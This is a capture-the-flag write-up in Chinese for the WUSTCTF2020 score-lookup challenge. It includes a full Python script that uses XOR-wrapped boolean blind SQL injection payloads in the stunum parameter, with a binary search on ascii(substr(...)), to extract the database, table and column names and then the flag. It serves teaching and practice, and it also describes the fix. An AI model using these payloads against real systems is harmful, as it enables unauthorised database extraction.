
[WUSTCTF2020]顏值成績查詢

開啟網頁

改變引數stunum發現頁面會發生變化。

輸入1成績100

輸入2成績666

最多可以輸入4

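通過嘗試可知引數 stunum 處存在布林盲注:輸入 0^1 時頁面顯示的是 stunum=1 的內容,說明引數被當作 SQL 表示式求值(0 異或 1 得 1),頁面內容的差異即可作為真/假的判斷依據。由此推測後端是把 stunum 直接拼接進查詢語句;改用引數化查詢或先把 stunum 轉成整數,這個注入點就不存在了。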

構造指令碼

import requests
# Boolean-blind extraction script for the WUSTCTF2020 challenge instance below.
#
# How the oracle works: stunum is evaluated as a SQL expression, so
# 1^(cond)^1 is 1 when cond is true and 0 when it is false. The page for
# stunum=1 ("Hi admin, your score is: 100") therefore signals "true".
#
# NOTE(review): the server code is not shown; the behaviour implies stunum is
# concatenated into the query. Binding it as a parameter or casting it to an
# integer removes the oracle.
# Each recovered character costs about seven GET requests whose query string
# contains ascii(substr(...)), which is an easy pattern to spot in access logs.
url = "http://e7e05311-6b4e-4bce-8545-ff53476b26a9.node4.buuoj.cn:81"

database = ""

# Every template takes (character position, threshold) through str.format.
payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1"  # database name: ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"  # table names: flag, score
payload3 = "?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"  # column names: flag, value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"  # contents of ctf.flag.value

# Stage in use. payload1, payload2 and payload3 were the earlier stages
# (database name, table names, column names), each run the same way.
template = payload4

# Text that only the stunum=1 page contains; its presence means "condition true".
true_marker = "Hi admin, your score is: 100"

for position in range(1, 10000):
    # Binary search for the character code at this position.
    low, high = 32, 128
    while low < high:
        mid = (low + high) // 2
        new_url = url + template.format(position, mid)
        r = requests.get(new_url)
        print(new_url)
        if true_marker in r.text:
            # ascii(char) > mid, so the code lies above mid.
            low = mid + 1
        else:
            high = mid

    # The search ends with low == high, which is the recovered code.
    code = low
    # 32 means every comparison was false, which is what a position past the
    # end of the string produces. 132 is kept from the original listing but
    # cannot occur, because the search never leaves 32..128.
    if code in (32, 132):
        break
    database += chr(code)
    print(database)

print(database)

flag{a35e0b79-a19d-491b-b1de-7222e913766c}